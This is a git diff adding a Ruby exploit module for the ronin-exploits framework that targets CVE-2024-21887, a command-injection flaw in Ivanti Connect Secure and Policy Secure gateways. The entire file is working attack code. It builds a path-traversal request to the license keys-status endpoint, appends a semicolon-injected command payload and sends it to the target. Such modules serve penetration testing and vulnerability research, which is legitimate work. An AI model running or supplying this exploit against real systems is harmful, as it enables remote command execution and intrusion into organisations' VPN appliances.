diff --git a/exploits/ivanti/CVE-2024-21887.rb b/exploits/ivanti/CVE-2024-21887.rb new file mode 100755 index 0000000..9198593 --- /dev/null +++ b/exploits/ivanti/CVE-2024-21887.rb @@ -0,0 +1,54 @@ +#!/usr/bin/env -S ronin-exploits run -f + +require 'ronin/exploits/command_injection' +require 'ronin/exploits/mixins/http' +require 'ronin/support/encoding/uri' + +module Ronin + module Exploits + class CVE_2024_21887 < CommandInjection + + include Mixins::HTTP + + register 'CVE-2024-21887' + + quality :poc + release_date '2024-01-19' + disclosure_date '2024-01-12' + advisory 'CVE-2024-21887' + + author "Postmodern", email: "postmodern.mod3@gmail.com" + summary "Command injection in Ivanti Connect Secure and Policy Secure (9.x, 22.x)" + description <<~DESC + Ivanti Connect Secure and Invait Policy Secure versions 9.x and 22.x are + vulnerable to a command injection in the `/api/v1/license/keys-status/` + HTTP end-point. + + GET /api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND + Content-Type: application/json + + DESC + references [ + "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US", + "https://github.com/zwxxb/CVE-2023-21887", + "https://github.com/zwxxb/CVE-2023-21887/blob/main/3xp.py" + ] + + # + # Sends the HTTP GET request for + # `/api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND` + # to the target host. + # + def launch + escaped_command = ";#{payload}".uri_escape + + response = http_get("/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command}", content_type: :json) + + unless response.code == '200' + fail("GET #{base_url}/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command} returned HTTP #{response.code}") + end + end + + end + end +end